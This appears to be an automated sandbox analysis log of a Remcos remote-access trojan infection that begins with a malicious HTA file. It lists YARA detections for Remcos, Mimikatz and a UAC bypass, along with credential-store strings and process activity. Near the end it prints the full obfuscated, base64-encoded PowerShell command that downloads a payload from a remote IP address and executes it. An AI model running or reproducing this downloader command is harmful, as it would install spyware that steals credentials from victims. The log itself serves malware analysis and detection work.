                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B04013_2_0044B040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043610D13_2_0043610D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044731013_2_00447310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044A49013_2_0044A490
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040755A13_2_0040755A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043C56013_2_0043C560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B61013_2_0044B610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044D6C013_2_0044D6C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004476F013_2_004476F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B87013_2_0044B870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044081D13_2_0044081D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041495713_2_00414957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004079EE13_2_004079EE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407AEB13_2_00407AEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044AA8013_2_0044AA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00412AA913_2_00412AA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404B7413_2_00404B74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404B0313_2_00404B03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044BBD813_2_0044BBD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404BE513_2_00404BE5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404C7613_2_00404C76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00415CFE13_2_00415CFE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00416D7213_2_00416D72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00446D3013_2_00446D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00446D8B13_2_00446D8B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00406E8F13_2_00406E8F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040503816_2_00405038
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041208C16_2_0041208C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004050A916_2_004050A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040511A16_2_0040511A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043C13A16_2_0043C13A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004051AB16_2_004051AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044930016_2_00449300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040D32216_2_0040D322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A4F016_2_0044A4F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041363116_2_00413631
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044669016_2_00446690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A73016_2_0044A730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004398D816_2_004398D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004498E016_2_004498E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A88616_2_0044A886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043DA0916_2_0043DA09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00438D5E16_2_00438D5E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00449ED016_2_00449ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041FE8316_2_0041FE83
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00430F5416_2_00430F54
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004050C217_2_004050C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004014AB17_2_004014AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040513317_2_00405133
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004051A417_2_004051A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040124617_2_00401246
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040CA4617_2_0040CA46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040523517_2_00405235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004032C817_2_004032C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040168917_2_00401689
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402F6017_2_00402F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: RegAsm.exe PID: 5940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@29/23@6/5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_0041798D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,11_2_0040F4AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0041B539
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0041AADB
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seethebestpicturewithgreatthingsinlinealways[1].tiffJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UCDCW8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2iohv0p.ot5.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.2585300569.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: RegAsm.exe, 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: RegAsm.exe, 0000000D.00000002.2594115440.000000000288A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\nicetokissthebestthingsiwantotgetmebackwith.hta"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE985.tmp" "c:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS"
